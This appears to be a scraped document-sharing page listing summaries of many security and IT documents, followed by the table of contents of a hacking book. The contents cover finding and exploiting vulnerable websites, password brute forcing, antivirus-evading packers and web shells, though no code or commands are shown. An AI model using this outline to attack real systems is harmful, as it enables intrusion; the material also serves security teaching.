This document introduces ethical hacking and discusses various hacking techniques. It covers topics like footprinting, scanning, enumeration, cracking passwords, viruses/worms, sniffers, social engineering, denial of service attacks, session hijacking, hacking web servers, web application vulnerabilities, SQL injection, wireless hacking, physical security, Linux hacking, evading detection, buffer overflows, and cryptography. The document provides information on hacking laws and describes many hacking methods and tools in detail.
Implementing and auditing security controls part 1, by Rafel Ivgi
This book introduces the 20 most critical security controls that any organization must implement to defend against modern cyber attacks. It discusses insider and outsider threats, common security standards from the US government, and how to audit controls to ensure they are effective. The document provides details on technical controls for network equipment, laptops, web servers, and more to help organizations implement the 20 critical security controls and protect their data.
This document introduces concepts related to securing Java web applications, including:
- Authentication methods like JAAS and how it integrates with application servers like JBoss.
- Authorization techniques including security roles and constraints.
- Configuring security features in JBoss like securing JMX consoles and remoting.
- Implementing authentication and authorization in applications using tools like jGuard.
Advanced web application hacking and exploitation, by Rafel Ivgi
This document introduces advanced web hacking techniques and methods for securing websites against attacks. It covers reconnaissance methods like detecting website statistics, IP addresses, subdomains, and server details. It then discusses various attacks like XSS, session hijacking, SQL injection, and ways to bypass web application firewalls. Finally, it provides recommendations for secure website architecture with multi-tier systems and hardening guides for platforms like IIS, Apache, and Tomcat.
This document discusses log management, including why log data is important, how organizations use log data, common pain points with log analysis, and key aspects of implementing a log management system. Log data provides value for system health monitoring, forensics investigations, regulatory compliance, and marketing insights. The document covers log collection, analysis, reporting, and various commercial and open-source log management tools and solutions.
Configuring Microsoft Windows IP Security to Operate with HP ..., by webhostingguy
This document provides instructions for configuring Microsoft Windows IP Security (IPsec) to operate with HP-UX IPSec in both host-to-host and end-to-end tunnel topologies. It describes how to create Windows IPsec policies with rules for address filtering and security associations. It also compares IPsec configuration parameters between Windows and HP-UX and provides troubleshooting tips.
This document provides an overview and reference for the Yahoo! Web Analytics API. It describes the supported entities that can be accessed via the API, such as accounts, projects, campaigns, and reports. It also outlines the main operations that can be performed, including initializing a session with the login call, retrieving and updating account information, scheduling and accessing reports, and reconciliation features. The document provides details on the SOAP and XML-RPC implementations and includes examples of API calls and responses.
This document provides an introduction to the book "Performance Tuning with SQL Server Dynamic Management Views" which explores the use of Dynamic Management Views (DMVs) and Dynamic Management Functions (DMFs) in SQL Server for performance monitoring and troubleshooting. The book covers DMVs in six categories including execution related, transaction related, index related, database/I/O related, and SQL operating system related DMVs. It aims to describe important columns returned by DMVs and provide scripts for investigating areas such as user activity, query plans, indexing strategies, I/O usage, and OS/hardware resources.
This document provides a tutorial for building an ASP.NET MVC Music Store application. It begins by creating a new ASP.NET MVC 3 project and adding a HomeController to handle the home page. Next, a StoreController is added to manage store browsing functionality, including listing music genres, browsing albums in a genre, and viewing album details. The tutorial then covers data access using Entity Framework Code First, adding validation, membership, a shopping cart, registration and checkout functionality. It concludes by implementing additional site features like navigation, layout updates, and displaying top selling albums on the home page.
This document provides an overview and tutorial for building an ASP.NET MVC Music Store application. It begins by creating a new ASP.NET MVC 3 project and adding prerequisite software. Controllers and views are then added to implement basic pages for the home, store index, and individual albums. The tutorial progresses to adding data access with Entity Framework Code First, validation, authorization, a shopping cart, registration/checkout, and final styling. Each section builds upon the previous to create a full-featured e-commerce music store application using ASP.NET MVC patterns and practices.
This document discusses service oriented architecture (SOA) and its application in real world systems. It begins with an introduction to SOA concepts like services, reuse, and loose coupling. It then discusses common architectural capabilities like messaging, workflow, data management and user experience that are important in SOA. The document provides an abstract reference model for SOA and shows how the common capabilities relate to the model's phases of expose, compose and consume. Later chapters discuss specific capabilities like messaging and workflow in more depth and provide examples.
This document provides information about the book "QuickTest Professional Unplugged - Second Edition" including preface material. The preface outlines that the book is intended for software testers who want to learn QTP and discusses what is new in the second edition. It also provides information on how to provide feedback or order the book. The document contains legal disclaimers about copyright and liability.
This document provides a tutorial on using the MySQL database system. It covers connecting to a MySQL server, entering queries, creating and selecting a database, creating and populating tables, and retrieving data from tables. Various SQL queries are demonstrated, including selecting, sorting, pattern matching, counting rows, and joining tables.
This document provides an overview of ethical hacking concepts and techniques, including footprinting, scanning, enumeration, and common tools used. It discusses the goals and processes of attackers, as well as important legal and ethical considerations. Footprinting involves passively gathering open-source information on a target organization like domain names, IP addresses, and technology used. Scanning uses tools like ping sweeps, port scanning with Nmap, and banner grabbing to identify active devices and services on a network. Enumeration discovers additional details about the target through techniques such as NetBIOS sessions, Active Directory information gathering, and SNMP scans. The document stresses the importance of only using these techniques with authorization and for legitimate security evaluation purposes.
Doctrine ORM for PHP is an object-relational mapper (ORM) for PHP applications. It provides transparent persistence for PHP objects and works with many databases including MySQL, PostgreSQL, and SQLite. The guide covers installing and configuring Doctrine, defining models and relationships, querying data with DQL, and additional features like validation, inheritance, behaviors and searching.
Cybersecurity is a constant, and, by all accounts growing, challenge. Although software products are gradually becoming more secure and novel approaches to cybersecurity are being developed, hackers are becoming more adept, their tools are better, and their markets are flourishing. The rising tide of network intrusions has focused organizations' attention on how to protect themselves better. This report, the second in a multiphase study on the future of cybersecurity, reveals perspectives and perceptions from chief information security officers; examines the development of network defense measures — and the countermeasures that attackers create to subvert those measures; and explores the role of software vulnerabilities and inherent weaknesses. A heuristic model was developed to demonstrate the various cybersecurity levers that organizations can control, as well as exogenous factors that organizations cannot control. Among the report's findings were that cybersecurity experts are at least as focused on preserving their organizations' reputations as protecting actual property. Researchers also found that organizational size and software quality play significant roles in the strategies that defenders may adopt. Finally, those who secure networks will have to pay increasing attention to the role that smart devices might otherwise play in allowing hackers in. Organizations could benefit from better understanding their risk posture from various actors (threats), protection needs (vulnerabilities), and assets (impact). Policy recommendations include better defining the role of government, and exploring information sharing responsibilities.
This document provides an overview and guide for using HSPcomplete, a hosting automation solution that allows hosting service providers to manage infrastructure, billing, sales channels, and e-commerce through a single system. It describes HSPcomplete's advantages like integrated billing and credit card processing, virtual private server management, and domain registration. Hardware, software, and user requirements for HSPcomplete deployment are also outlined.
The document is a report from Arbor Networks that analyzes data from a survey of over 500 network operators regarding infrastructure security threats in 2011. Some key findings include:
- Distributed denial-of-service (DDoS) attacks were considered the most significant operational threat. Application-layer DDoS attacks using HTTP floods were most common.
- The largest reported DDoS attacks exceeded 100 Gbps in bandwidth. Major online gaming and gambling sites were frequently targeted.
- Most respondents experienced multiple DDoS attacks per month and reported increased awareness of the DDoS threat over the previous year.
- Network traffic detection, classification, and event correlation tools were commonly used to identify attacks and trace sources. DDo
This document provides a baseline risk assessment of the information technology sector. It identifies 6 critical functions: producing and providing IT products and services, domain name resolution services, identity management and trust services, internet-based content and communication services, internet routing and connection services, and incident management capabilities. For each function, the document describes attack trees, assesses threats, vulnerabilities and consequences to determine relative risks, and identifies mitigation strategies. It also discusses interdependencies between critical functions and the sector's dependencies. The goal is to enhance cybersecurity through public-private collaboration.
Comparing Game Development on the Android and Windows Phone 7 Platforms, by Ruairí O'Brien
A document I did in College for my final year project detailing my experience developing the same game for both the Android and Windows Phone 7 mobile platforms.
A Real Time Application Integration Solution, by Matthew Pulis
My final project for my BSc. Business Computing degree. The work involved designing a system for a helicopter company operating in the Maltese islands. The design was performed using UML. Prototypes were also drafted to enhance the solution.
This document provides an overview of tools and techniques for iOS reverse engineering. It discusses prerequisites for iOS reverse engineering like jailbreaking. It also describes the process of iOS reverse engineering including system analysis and code analysis. The document outlines various tools for iOS reverse engineering on OSX and the jailbroken iOS device itself including class-dump, Theos, IDA, Cycript and LLDB. It provides examples of using these tools and reversing iOS apps and system libraries.
The document provides an introduction to artificial intelligence, including:
- A brief history of AI from the 1980s "AI winter" period of failed projects through to recent advances enabled by improved hardware and new research areas like machine learning.
- Knowledge representation and reasoning, rule engines, hybrid reasoning systems, and expert systems are introduced as key concepts in AI.
- The advantages of using a rule engine are discussed, as well as when rule engines are appropriate versus other approaches like scripting engines. The Rete algorithm, which is commonly used in rule engines, is also introduced.
The document provides instructions for accessing and using a contact management database (CMD) system. It includes information on:
1) Logging into the system remotely by establishing a VPN connection and accessing the application URL.
2) Navigating the system using tab menus to access modules like prospects, to-do lists, reports, and manuals.
3) Performing searches and advanced searches on prospects and other data, adding and editing contact information, notes, addresses, and more.
4) Instructions include screenshots and tips for optimizing the interface.
Sybase Adaptive Server Anywhere for Linux, by marcorinco
This document provides instructions for installing and using Sybase Adaptive Server Anywhere for Linux. It begins with an introduction that describes Adaptive Server Anywhere's features and requirements. It then covers installing SQL Anywhere Studio, creating and connecting to databases, backing up and restoring data, and basic database administration tasks. The document aims to guide moderately experienced Linux users through getting started with Adaptive Server Anywhere.
This document provides an introduction to derivatives, including futures and options. It discusses key concepts such as the definition of derivatives and their economic functions. It also describes different types of derivatives products and participants in the derivatives markets. The document focuses on the Indian derivatives market and covers important indexes like the S&P CNX Nifty. It explains the pricing and applications of futures and options, including how they can be used for hedging, speculation, and arbitrage.
This document provides instructions for handling, installing, wiring, operating and maintaining an inverter. It discusses the inverter structure, removing covers, installing optional units, transportation, installation location, clearances, wiring diagrams, pre-operation checks, parameter settings, test runs, parameter unit functions and operation, maintenance, troubleshooting, optional accessories and specifications. Key points include proper handling to prevent damage, ambient temperature requirements, main and control circuit wiring, pre-operation checks and settings, monitoring and adjusting parameters, and protective functions.
A software bug is an error in a computer program that produces unexpected or incorrect results. Security bugs compromise authentication, authorization, data confidentiality, or integrity. Hackers find security bugs through reverse engineering code or fuzzing software to discover vulnerabilities. An exploit is a piece of code that activates a bug to run malicious code. Shellcode is typically used as the payload in an exploit to gain control of a compromised system. Cyber attacks can target individuals, networks, or remote systems. Advanced persistent threats (APTs) are sophisticated, well-funded hacking groups that persistently target specific entities over long periods using social engineering and zero-day exploits. APT attacks involve penetrating targets, spreading to other systems, aggregating data, and covert
This document discusses various topics related to anonymity on darknets including:
- Ways enterprises bypass data leakage prevention including encryption and VPNs
- Differences between proxies, Tor, and VPNs and why Tor provides more anonymity
- Options for maximum anonymity hosting and WikiLeaks platforms on darknets
- Using open Wi-Fis or custom configurations as darknet exit nodes
- Digital currencies and tools like OpenTransactions that allow untraceable transactions
- Decentralized portal systems like Osiris and peer-to-peer networks for private file sharing and chat
- The relationship between encryption, anonymity, and enabling free speech
This document outlines the agenda and topics covered in a presentation on cyber crime. The presentation discusses the definition of cyber crime, the major players involved, common money laundering and anonymous purchasing techniques, and gives a live demonstration of how to anonymously conduct illegal activities online. Key points covered include the international nature of cyber crimes, challenges with legal accountability across borders, common cyber crime products and services, and the use of technologies like TOR and cryptocurrencies to conduct activities anonymously.
This document provides an overview and introduction to using Shodan, an internet search engine that allows users to search for publicly available devices and services. It describes what types of data Shodan collects, including banners which provide information about the service or device, and metadata like the device's location and operating system. It also discusses how the data is collected through Shodan's crawlers that scan the internet regularly, and that the data collected includes information on devices accessible via both IPv4 and IPv6 networks. The document serves as an introduction to using Shodan and exploring the different data and interfaces it provides.
This document is the introduction chapter of "The Hitchhiker's Guide to DFIR: Experiences From Beginners and Experts", a crowdsourced book by members of the Digital Forensics Discord Server. The book is available for purchase online and covers topics in digital forensics and incident response through shared experiences of practitioners at various levels of experience. This introduction chapter outlines the purpose of the book in providing guidance for both beginners and experts in DFIR, and encourages participation from the community to expand the book.
The document provides an overview of getting started with GNU/Linux. It covers useful terminal shortcuts, file management commands like navigating directories, listing files, and copying/removing files. It also discusses detecting the Linux distribution, getting system information, and using common commands like ls, tar, ssh and more. The document is intended as a reference for Linux professionals.
The document provides an overview of the Linux operating system and includes chapters on getting started with Linux, detecting the Linux distribution, getting kernel information, shell usage, checking disk space, system information, file compression and manipulation commands, service management, user management, installing LAMP stacks, network configuration utilities, secure shell (SSH), secure copy (SCP), GnuPG encryption, and more. It contains tutorials, examples, and explanations of common Linux commands and tasks.
Easttom C. Computer Security Fundamentals 3ed 2016.pdfJarellScott
This document is a table of contents for the book "Computer Security Fundamentals Third Edition" by Chuck Easttom. It provides an overview of the chapters included in the book, which cover topics such as introduction to computer security, networks and the internet, cyber stalking and fraud, denial of service attacks, malware, techniques used by hackers, encryption, computer security software, security policies, and network forensics. The table of contents lists the chapter titles, main section headings within the chapters, and page numbers to locate specific content within the book.
This document provides an overview of the Linux operating system and fundamentals for learning Linux, including:
- Details on Linux distributions like Debian, Red Hat, and SUSE and their licensing models.
- A brief history of open source software development and benefits of the open source model.
- Essentials of the Linux operating system like filesystem structure, shell commands, file permissions and redirection.
- Information on Linux certification programs.
- Setup instructions for a Linux emulator for the fundamentals course.
- Appendices on Linux Professional Institute certification levels and the Linux kernel.
This document outlines the machine requirements, prerequisites, and expected outcomes for courses on Linux fundamentals, system administration, networking, shell scripting, and internals.
For the fundamentals course, a Pentium 2 500MHz computer with 32MB RAM is recommended. The system administration course requires completion of the fundamentals course first. After completing fundamentals and system administration, the student reaches the equivalent of a junior administrator. Additional courses build on this knowledge towards senior roles.
This document provides an overview of the Linux operating system and fundamentals for learning Linux, including:
- Details on Linux distributions like Debian, Red Hat, and SUSE and their licensing models.
- A brief history of open source software development and benefits of the open source model.
- How to log into a Linux system, basics of the shell, command line navigation, and file management.
- Key topics covered include files/directories, permissions, and redirection.
- Information on Linux certification programs.
- Setup instructions for a Linux emulator for the fundamentals course.
Guide on the use of Artificial Intelligence-based tools by lawyers and law fi...Massimo Talia
This guide aims to provide information on how lawyers will be able to use the opportunities provided by AI tools and how such tools could help the business processes of small firms. Its objective is to provide lawyers with some background to understand what they can and cannot realistically expect from these products. This guide aims to give a reference point for small law practices in the EU against which they can evaluate those classes of AI applications that are probably the most relevant for them.
This document is a book about expert Oracle database architecture for versions 9i and 10g. It discusses programming techniques and solutions. The book covers topics such as developing successful Oracle applications, database architecture overview, database files, memory structures, SQL and PL/SQL, concurrency and locking, performance, backup and recovery, and more. It aims to help readers understand Oracle architecture and how to write efficient and optimized database applications.
National Security Implications of virtual currency examining the potential fo...Dmitry Tseitlin
The document examines the potential for non-state actors to deploy virtual currencies to increase their political or economic power. It discusses how virtual currencies have evolved from early digital currencies and explores Bitcoin and other altcoins. It considers why a non-state actor may want to deploy a virtual currency and the technical challenges involved, such as developing software, gaining adoption, ensuring anonymity, and protecting against cyber threats. The document also discusses how technologies behind virtual currencies could enable resilient decentralized services beyond just currency.
DotNet & Sql Server Interview QuestionsNeeraj Kaushik
This document contains a table of contents listing 50 important topics for .NET interviews. The topics covered include what CLR does, common type system, common language specification, boxing and unboxing, variables, jump statements, nullable types, strings, indexers, iterators, secure strings, enumerated types, interfaces, app domains, threading, data assignment differences between value and reference types, cloning, assemblies, events vs delegates, object size, disposal patterns, data readers vs datasets, temporary tables, impersonation, and client-side form validation. The document provides a high-level overview of concepts that may be discussed during .NET interviews.
This chapter discusses setting up your development environment for SAS Infrastructure for Risk Management. It describes installing the Python scripting client, which allows you to create and run parallel programs on the platform. Example code is provided to interact with a sample federated area where data and tasks can be stored.
The document provides guidance on establishing an effective information security program. It outlines a security process with five key areas: risk assessment, security strategy, control implementation, monitoring, and continuous updating. It emphasizes the importance of governance, with clear roles and responsibilities for the board, senior management, and other parties. The board is responsible for overseeing the program, while management is accountable for implementation and ongoing risk management.
Take a close look at the complete guide on how to set up and use the SafeDNS service. In it you will find answers to the most common questions that arise when using SafeDNS.
With the help of this guide you can easily configure internet filtering on any device, learn how to efficiently use additional features, a filtering schedule and separate filtering policies, as well as find answers to key questions about buying a license and extending the SafeDNS service.
Sonic os standard_3_9_administrators_guideAshwani Singh
This document is an administrator's guide for SonicOS Standard 3.9 that provides comprehensive internet security. It contains information about setting up and configuring SonicWALL security appliances, including collecting ISP information, running the setup wizard, registering the appliance, and viewing system status and settings. The guide is organized into sections covering introduction and setup, system configuration and management, and technical reference for features.
This document provides an overview of the Microsoft Windows XP Registry and how it can be used and managed. It discusses the structure and organization of the registry, tools for editing and managing the registry like Registry Editor, backing up the registry, customizing Windows XP settings by modifying the registry, deploying registry-based group policies, managing registry security, finding registry settings, scripting registry changes, deploying user profiles, using Windows Installer and answer files to deploy applications, cloning disks using Sysprep, deploying Microsoft Office user settings, and working around common IT problems. The document is divided into multiple parts covering registry overview, management, deployment, and appendices. It provides technical details and step-by-step instructions for advanced registry
This document is the PSpice User Guide for product version 17.2-2016 published in April 2016. It provides an overview of PSpice, describes how to use PSpice with other Cadence tools, explains the files needed for simulation, discusses library management, and provides examples for creating simulation models and running analyses.
This document evaluates the Strategic Decision Support Centers (SDSCs) implemented by the Chicago Police Department.
The SDSCs are real-time crime centers located in each police district that bring together staff, technologies, and data to support policing operations and strategic decision-making. The evaluation assessed SDSC operations, technologies, and the impact on crime rates.
The evaluation found that the SDSCs functioned as intended by facilitating communication and information sharing. Technologies like ShotSpotter, police cameras, and mapping tools supported response to crimes and monitoring of areas. Statistical analyses estimated that SDSCs were associated with moderate reductions in total crime rates of 5-10% in their respective districts.
The document discusses configuring JBoss to work behind a firewall by modifying socket-based services that open listening ports. It lists several key JBoss services that open ports by default, including the naming service on port 1098, invoker services on ports 4444 and 4445, and others. It provides the configuration files and attributes to modify ports for each service.
The document analyzes vulnerabilities found in web applications through various scanning methods. It finds that over 48% of scanned web applications were not compliant with PCI DSS requirements when assessed through ASV scanning. However, a deeper analysis showed that nearly 99% of web applications were actually not compliant with the PCI DSS security standards. Administration flaws accounted for about 20% more vulnerabilities than code-based issues, and whitebox testing was necessary to detect many vulnerabilities that other methods missed.
Implementing and auditing security controls part 2Rafel Ivgi
This document describes the main functionalities and benefits of a network inventory management system. The key functionalities include real-time tracking of unmanaged devices, detailed hardware and software inventory information, history tracking of changes to inventory objects, auto-discovery and reconciliation to keep inventory up-to-date, network planning capabilities, and inventory-based billing. Benefits include an end-to-end view of networks, reduced operating costs, improved resource utilization, efficient change management, and seamless integration.
Firmitas Cyber Solutions - Infographic - Mirai Botnet - A few basic facts on...Rafel Ivgi
Firmitas Cyber Solutions - Infographic - Mirai Botnet - A few basic facts on a world-wide epidemic
500,000 Vulnerable Devices
More than 500k vulnerable devices found globally.
The malware exploited 62 default router & camera passwords, as well as TR-064 and TR-069 OS Command-Injection vulnerabilities.
120,000 Successful Infections (per day)
72,000 unique IPs infected in 12 hours, ~4000 new IPs per hour.
The worm is still running, and new variants of it are released daily into the wild, taking over more devices. Most of the devices are home/office routers and CCTV cameras.
1.5 Tbps - Mirai: DDoS Record-Holder
Until Mirai, the world-record DDoS attacks reached 600 Gbps.
In 2014, the average size of a DDoS attack was 7.39 Gbps.
2015 saw an increase to 500 Gbps.
In October 2016, Mirai ascended to the next level.
Mirai vs. Other IoT Botnets
Mirai - 500k infections, 1.5 Tbps DDoS
GayFgt/LizKebab/Torlus/Kaiten/Tsunami/PNScan/Qbot - 120k infections, 655 Gbps DDoS
Linux/IRCTelnet (new Aidra) - 3.5k infections, 100.5 Gbps DDoS
LizardStresser - 118k infections, 400 Gbps DDoS
Aidra (Carna/Darlloz) - 420k infections, 1.26 Tbps DDoS
Home & office routers, CCTV cameras, smart watches, and the IoT devices of the new era are becoming the main targets for remote takeover. DDoS and crypto-currency mining are the main reasons, but the future holds more "attractions", more risks, and more target devices.
Firmitas solutions can be used to actively protect IoT devices, and prevent any unexpected/unintended behavior.
SCADA Cyber-Risk: Fact or Fiction?
Vulnerabilities vs. Incidents
Firmitas Presenting a New Approach
Attacks on Industrial Control Systems are a growing threat to critical infrastructure. No current technology can keep up with the upward trend of reported vulnerabilities, and incidents based on such vulnerabilities. This trend forces a new approach for securing mission-critical systems ...
Device-Side Protection
The targets of the attacks are the devices themselves.
Thus the devices must be protected rather than the computer sending the commands.
Prevention
Firmitas focuses on protection by prevention, evolving from the well-known limitations of existing detection and situational-awareness technologies.
Deterministic
The Firmitas deterministic solution is based on the pre-defined communication model of the specific target system. It is free from the limitations of updates, signatures, or heuristics.
The United States Government acknowledging my professional skills in technology and the information security field as equivalent to more than a B.Sc. and approving an O1 Visa for me.
This document is a CompTIA certification for Rafel Ivgi that is valid through March 07, 2014. It provides a certification code of EMCNTXYDED1EKYJY that can be verified online at http://verify.CompTIA.org.
Rafel Ivgi received an email from ISACA congratulating him for passing the CISM exam in June 2011 and encouraging him to apply for certification. The email details the benefits of obtaining the CISM certification and outlines the simple 3-step application process. It notes that while Rafel has 5 years to apply after passing the exam, his window to apply without paying an application fee will close on June 1, 2012. ISACA looks forward to Rafel joining the over 16,000 professionals who have earned the CISM designation.
This document provides an overview of web and desktop application security topics such as cross-site scripting (XSS), SQL injection, cross-site request forgery (CSRF), and more. It discusses the risks and techniques associated with each topic, including how to perform security testing through black box, gray box, and white box penetration testing methods. The document also provides prevention recommendations such as request validation, whitelist input filtering, and secure coding practices.
HijackLoader Evolution: Interactive Process HollowingDonato Onofri
CrowdStrike researchers have identified a HijackLoader (aka IDAT Loader) sample that employs sophisticated evasion techniques to enhance the complexity of the threat. HijackLoader, an increasingly popular tool among adversaries for deploying additional payloads and tooling, continues to evolve as its developers experiment and enhance its capabilities.
In their analysis of a recent HijackLoader sample, CrowdStrike researchers discovered new techniques designed to increase the defense evasion capabilities of the loader. The malware developer used a standard process hollowing technique coupled with an additional trigger that was activated by the parent process writing to a pipe. This new approach, called "Interactive Process Hollowing", has the potential to make defense evasion stealthier.
Honeypots Unveiled: Proactive Defense Tactics for Cyber Security, Phoenix Sum...APNIC
Adli Wahid, Senior Internet Security Specialist at APNIC, delivered a presentation titled 'Honeypots Unveiled: Proactive Defense Tactics for Cyber Security' at the Phoenix Summit held in Dhaka, Bangladesh from 23 to 24 May 2024.
Securing BGP: Operational Strategies and Best Practices for Network Defenders...APNIC
Md. Zobair Khan, Network Analyst and Technical Trainer at APNIC, presented 'Securing BGP: Operational Strategies and Best Practices for Network Defenders' at the Phoenix Summit held in Dhaka, Bangladesh from 23 to 24 May 2024.
HACKER TECHNIQUES, EXPLOIT AND INCIDENT HANDLING
Defensia
2011
Rafel Ivgi
This book introduces the world of hacking and involves the reader with the current players, the rules of the game, motivation and new trends.
TABLE OF CONTENTS
Introduction to Ethical Hacking Problem Definition – Why? ........................................................ 11
How does a hacker see the world? ........................................................................................... 11
Hacking - Laws www.usdoj.gov..................................................................................................... 12
United States of America: Securely Protect Yourself against - Cyber Trespass Act (SPY ACT). 12
U.S. Federal Laws....................................................................................................................... 13
Section 1029.......................................................................................................................... 13
Section 1030.......................................................................................................................... 14
18 U.S.C. §1362...................................................................................................................... 17
18 U.S.C. §2318 - Trafficking in counterfeit…........................................................................ 18
18 U.S.C. §2320 - Trademark Offenses Trafficking in counterfeit goods or services ............ 18
18 U.S.C. §1831 - Trade Secret Offenses Economic espionage Law...................................... 18
47 U.S.C. §605 - Unauthorized publication or use of communications ................................ 18
Foot-printing visiting Reconnaissance........................................................................................... 20
Foot-Printing each Service Server Software Name and Version............................................... 20
Foot-Printing HTTP Servers.................................................................................................... 20
Foot-Printing FTP Servers...................................................................................................... 23
Foot-Printing Telnet Servers.................................................................................................. 23
Fingerprinting VoIP Servers:...................................................................................................... 24
Fingerprinting Products of Specific Vendors:............................................................................ 24
WHOIS ....................................................................................................................................... 28
Google Hacking What is Google hacking....................................................................................... 32
Finding Old Vulnerable Web Pages / Fast & Passive Web Crawling/Spidering......................... 32
Finding Login Interfaces......................................................................................................... 33
Finding Exploitable Vulnerable Web Systems by Signature...................................................... 34
Choosing a public exploit:...................................................................................................... 34
Finding a vulnerable website .......................................................................................... 35
Verifying the vulnerability exists........................................................................................... 37
Exploiting the Vulnerability ................................................................................................... 38
Opening a free hosting account ............................................................................................ 38
Finding Cameras........................................................................................................................ 41
Finding Password Files............................................................................................................... 43
Scanning and Scanning Definition................................................................................................. 46
Enumeration Overview of System Hacking Cycle.......................................................................... 48
Enumerating the allowed HTTP Methods on a Web Server:..................................................... 48
Enumerating Usernames Using Google..................................................................................... 49
Exposed Configuration Files .................................................................................................. 49
Company Email Addresses: ................................................................................................... 50
SMTP Enumeration (VRFY, EXPN, RCPT TO, NDR)..................................................................... 51
Using the SMTP VRFY Command........................................................................................... 51
Using the SMTP EXPN Command .......................................................................................... 52
Using the SMTP RCPT TO Command ..................................................................................... 53
Non Delivery Response (NDR)............................................................................................... 54
POP3 Enumeration .................................................................................................................... 54
Private User Directories............................................................................................................. 56
Apache User Enumeration..................................................................................................... 56
WordPress Authors Template User Enumeration Vulnerability ........................................... 56
FTP............................................................................................................................................. 58
CWD Username Enumeration Vulnerability (Example: Solaris in.ftpd) ................................ 58
FTP Server Authentication Delay Username Enumeration Vulnerability (Example: ProFTPD) ............ 58
Telnet......................................................................................................................................... 58
Telnet Server User Field Account Enumeration (Example: Cisco Aironet)............................ 58
Web Server Pre-Login – HTTP Response based enumeration (Example: Lotus Domino) .......... 58
Error Message User Enumeration:............................................................................................ 59
NetBIOS User Enumeration....................................................................................................... 59
McAfee Foundstone SuperScan 4: ........................................................................................ 61
NetBIOS Enumerator............................................................................................................. 62
GFI LANguard.......................................................................................................................... 63
SNMP Enumeration................................................................................................................... 63
DNS Enumeration...................................................................................................................... 64
Dictionary Based DNS Enumeration...................................................................................... 65
Brute Forcing DNS Sub-Domains............................................................................................... 65
VoIP User Enumeration ............................................................................................................. 66
Enumerating Extensions:....................................................................................................... 66
Enumerate Usernames: (Example: Inter Asterisk Exchange protocol) ................................. 66
Citrix Published Applications Remote Enumeration ................................................................. 67
System Hacking Part 1- Cracking Password................................................................................... 69
Brute Forcing Passwords – Telnet:............................................................................................ 69
Cracking Accounts Using Hydra................................................................................................. 69
Cracking Accounts Using Medusa: ............................................................................................ 70
Brute Forcing Check Point Client Authentication Remote Service............................................ 71
Brute Forcing Citrix ICA Servers................................................................................................. 71
Trojans and Backdoors Effect on Business.................................................................................... 76
Auto Dialers............................................................................................................................... 77
FraudWare................................................................................................................................. 77
Keylogger................................................................................................................................... 78
Spyware & Browser Trojans ...................................................................................................... 79
Trojans....................................................................................................................................... 79
Password Stealers...................................................................................................................... 79
RansomWare............................................................................................................................. 80
Viruses and Worms Virus History.................................................................................................. 82
Local Replicating Viruses ........................................................................................................... 82
Worms....................................................................................................................................... 83
Antivirus..................................................................................................................................... 83
Packers/Crypters – Bypassing Anti-Viruses............................................................................... 84
Netcat - Original – Less Than Packed .................................................................................... 85
Netcat * RDG PolyPack v1.1 .................................................................................................. 88
Poison Ivy............................................................................................................................... 89
SCPack 1.1.............................................................................................................................. 89
Alternate EXE Packer............................................................................................................. 91
Alternate EXE Packer............................................................................................................. 92
Poison Ivy * MEW.................................................................................................................. 93
Poison Ivy * ACprotect .......................................................................................................... 94
sixxpack v2.2Eng.................................................................................................................... 95
DotFuscator............................................................................................................................... 95
Sniffers Definition – Sniffing.......................................................................................................... 98
Man in the Middle..................................................................................................................... 98
Hub vs. Switch ........................................................................................................................... 98
MAC Spoofing............................................................................................................................ 99
MAC Flooding / CAM Table Overflow...................................................................................... 100
Description .......................................................................................................................... 100
MAC Flooding ...................................................................................................................... 100
Port Stealing ............................................................................................................................ 102
STP mangling ........................................................................................................................... 104
Address Resolution Protocol (ARP) Spoofing .......................................................................... 104
IP Spoofing............................................................................................................................... 105
VLANS ...................................................................................................................................... 106
ICMP Redirect.......................................................................................................................... 107
Public Key Exchanging ............................................................................................................. 109
Command Injection ................................................................................................................. 110
Malicious Code Injection......................................................................................................... 110
Downgrade Attacks - SSH V2 to V1 ......................................................................................... 110
Downgrade Attacks - SSH V2 to V1...................................................................................... 110
Downgrade Attacks - IPSEC Failure ......................................................................................... 110
Downgrade Attacks – PPTP ..................................................................................................... 111
PPTP:.................................................................................................................................... 111
Social Engineering ....................................................................................................................... 112
Email Spoofing......................................................................................................................... 112
Social Engineering Tool-Kit...................................................................................................... 114
Tab-Nabbing ............................................................................................................................ 119
ClickJacking / Interface Spoofing............................................................................................. 119
Phishing ....................................................................................................................................... 121
Diversion theft......................................................................................................................... 121
Quid pro quo ........................................................................................................................... 122
Social Engineering - Source Validation.................................................................................... 122
Pretexting – Collecting Names, Emails & Phone Numbers ..................................................... 123
Pretexting – Collecting Names & Roles ................................................................................... 124
Target and Attack .................................................................................................................... 125
Social Engineering by Phone ................................................................................................... 126
Dumpster Diving...................................................................................................................... 127
On-Line Social Engineering...................................................................................................... 127
Persuasion ............................................................................................................................... 128
Reverse Social Engineering...................................................................................................... 129
Hacking Email Accounts............................................................................................................... 130
Key-logging: The Easiest Way! ................................................................................................ 130
Phishing: The Difficult Way ..................................................................................................... 130
Common Myths and Scams Associated with Email Hacking ................................................... 130
Denial-of-Service - Real World Scenario of D.o.S Attacks ........................................................... 132
Ping of Death........................................................................................................................... 132
Permanent denial-of-service attacks – PDOS.......................................................................... 132
IP Spoofing............................................................................................................................... 133
Land Attack.............................................................................................................................. 133
SYN Flood................................................................................................................................. 134
SYN Flood + IP Spoofing........................................................................................................... 136
Reflected attack: Source IP Spoofing + SYN Sent .................................................................... 137
Distributed attack – DDOS....................................................................................................... 138
Amplification/Smurf attack ..................................................................................................... 140
Session Hi-Jacking - What is Session Hi-Jacking?......................................................................... 142
Hacking Web Servers - How Web Servers Work ......................................................................... 148
Components of a generic web application system ................................................................. 148
URL mappings to the web application system ........................................................................ 149
Flowchart for a one-way web hack ......................................................................................... 150
Finding the entry point............................................................................................................ 151
Exploiting poorly validated input parameters..................................................................... 152
Exploiting SQL injection....................................................................................................... 152
Invoking the command interpreter..................................................................................... 153
Posting commands to CMD.EXE .......................................................................................... 153
Posting commands to /bin/sh ............................................................................................. 154
Automating the POST process............................................................................................. 155
Output of post_cmd.pl ........................................................................................................ 155
Web based command prompt............................................................................................. 157
Perl - perl_shell.cgi .............................................................................................................. 157
ASP - cmdasp.asp................................................................................................................. 158
PHP - sys.php....................................................................................................................... 160
JSP - cmdexec.jsp................................................................................................................. 160
Installing the Web based command prompt....................................................................... 161
Re-creating arbitrary binary files......................................................................................... 162
File uploader............................................................................................................................ 162
ASP - upload.asp and upload.inc ......................................................................................... 162
Perl - upload.cgi................................................................................................................... 163
PHP - upload.php................................................................................................................. 164
